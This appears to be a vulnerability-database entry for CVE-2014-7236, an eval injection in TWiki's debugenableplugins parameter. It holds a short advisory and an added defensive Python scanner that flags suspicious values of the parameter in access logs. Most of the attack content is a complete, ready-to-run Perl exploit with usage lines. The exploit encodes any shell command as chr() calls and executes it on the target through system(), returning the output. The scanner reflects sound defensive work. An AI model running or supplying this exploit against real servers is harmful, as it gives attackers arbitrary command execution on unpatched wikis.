
CVE-2014-7236: Arbitrary Perl code execution vulnerability in TWiki before 6.0.1

A free, open vulnerability database that anyone can edit


INFO

Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.
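
For defenders, an added example (not part of the original entry and not TWiki code): a Python check that flags web-server access-log lines in which the debugenableplugins parameter carries anything other than a comma-separated list of plugin names. The allowed-value pattern, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

PARAM = "debugenableplugins"
# Assumption: a legitimate value is a comma-separated list of plugin names.
PLUGIN_LIST = re.compile(r"[A-Za-z0-9_]+(?:\s*,\s*[A-Za-z0-9_]+)*")
# Request line inside an Apache/nginx combined-format log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '192.0.2.10 - - [10/Oct/2014:13:55:36 +0000] "GET /do/view/Main/WebHome HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Oct/2014:13:56:01 +0000] "GET /do/view/Main/WebHome?debugenableplugins=SmiliesPlugin,TablePlugin HTTP/1.1" 200 5090',
    '192.0.2.12 - - [10/Oct/2014:13:57:44 +0000] "GET /do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bPLACEHOLDER%28%29 HTTP/1.1" 200 37',
]


def check_line(line):
    """Return (verdict, value); verdict is None, 'present' or 'suspicious'."""
    m = REQUEST.search(line)
    if not m:
        return None, None
    query = urlsplit(m.group("target")).query
    # Split on '&' only, then percent-decode, so '%3b' and a raw ';' both
    # stay inside the value instead of being treated as a separator.
    for key, value in parse_qsl(query, keep_blank_values=True, separator="&"):
        if key == PARAM:
            ok = PLUGIN_LIST.fullmatch(value.strip())
            return ("present" if ok else "suspicious"), value
    return None, None


def scan(lines):
    """Return (line number, verdict, decoded value) for every line using PARAM."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        verdict, value = check_line(line)
        if verdict:
            hits.append((lineno, verdict, value))
    return hits


if __name__ == "__main__":
    for lineno, verdict, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}: {value!r}")
```

Access logs record only the query string, so a parameter sent in a POST body needs a WAF or application-level log to be seen. Even a "present" hit deserves a look on a production wiki, since the parameter is a debugging aid.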

Usage

perl exploit.pl host cmd

ex. perl exploit.pl http://127.0.0.1/Main/WebHome "uname -a"

EXP

#!/usr/bin/perl
=cut
TWiki code execution CVE-2014-7236
m0nad <m0nad/at/email.com>
ref: http://seclists.org/fulldisclosure/2014/Oct/44
=cut
use LWP::Simple;
use strict;
use diagnostics;
use warnings;
sub banner
{
	print "* TWiki code execution CVE-2014-7236\n";
	print "* m0nad <m0nad/at/email.com>\n";
}
sub usage
{
	print "? usage: perl $0 <host> cmd\n";
	print "? ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n";
	exit;
}
sub exploit
{
	my ($host, $cmd) = @_;
	$cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl";
	my $byte =  join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));
	my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit";

	my $res = get $host . $payload;
	print "- Exploit Failed\n" and exit unless ($res =~ m/start_xpl\n(.*?)end_xpl/ms);
	print "+ $1";
}
banner();
my $host = shift || usage();
my $cmd = shift || "echo Vulnerable!";
exploit($host, $cmd);
